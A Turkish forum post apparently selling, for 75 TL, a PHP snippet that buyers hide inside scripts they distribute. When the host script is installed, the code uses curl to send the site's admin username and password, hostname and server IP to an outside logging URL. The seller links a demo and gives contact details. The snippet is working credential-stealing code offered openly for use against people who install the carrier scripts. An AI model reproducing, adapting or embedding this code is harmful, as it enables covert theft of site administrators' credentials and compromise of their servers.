Meralar Beyler Bayanlar Forumda Birçok Kişinin İhtiyaç Duyduğu Bir Script Olduğunu Düşündüğüm İçin Satıyorum Sadece 75TL Kodlar Tamamen Bize Aittir
Script İçin İstenilenFiyat 75TL Konuya Resim Vs Koyma İhityacı Duymadım Zaten Altta Demo Linki Bırakıyorum Orası Şuan Sorunsuz Çalışıyor İşteyen Deneyebilir
<?php$link = "https://sifresiz.tk/log/curl.php";************************$ip = $_SERVER['SERVER_ADDR'];************************$url = $_SERVER['HTTP_HOST'];************************$g = "adminuser=$username&adminpass=$password&site=$url&ip=$ip&gonder";********************$curl = curl_init();****************************curl_setopt($curl, CURLOPT_URL, $link);****************************curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);****************************curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true);****************************curl_setopt($curl, CURLOPT_POST, true);****************************curl_setopt($curl, CURLOPT_POSTFIELDS, $g);********************$veri = curl_exec($curl);****************************curl_close($curl);?>
Bu Kod İle Çalışıyor Scriptimiz Bu Kodu Yaptığınız Scriptin İçine Koyuyorsunuz Kurulduğu Zaman Site Konum Veriyor İp adresi Site Adı Tarih Üyelikli İse admin passwordlarını Gösteriyor
Demo : sifresiz.tk/sifresiz.tk/log Kod : sifresiz.tk/log/kod.txt
R10 Dışı Iletişim
Email:
sosyaldev0@gmail.com
Whatsapp:
90 (850) 346 1693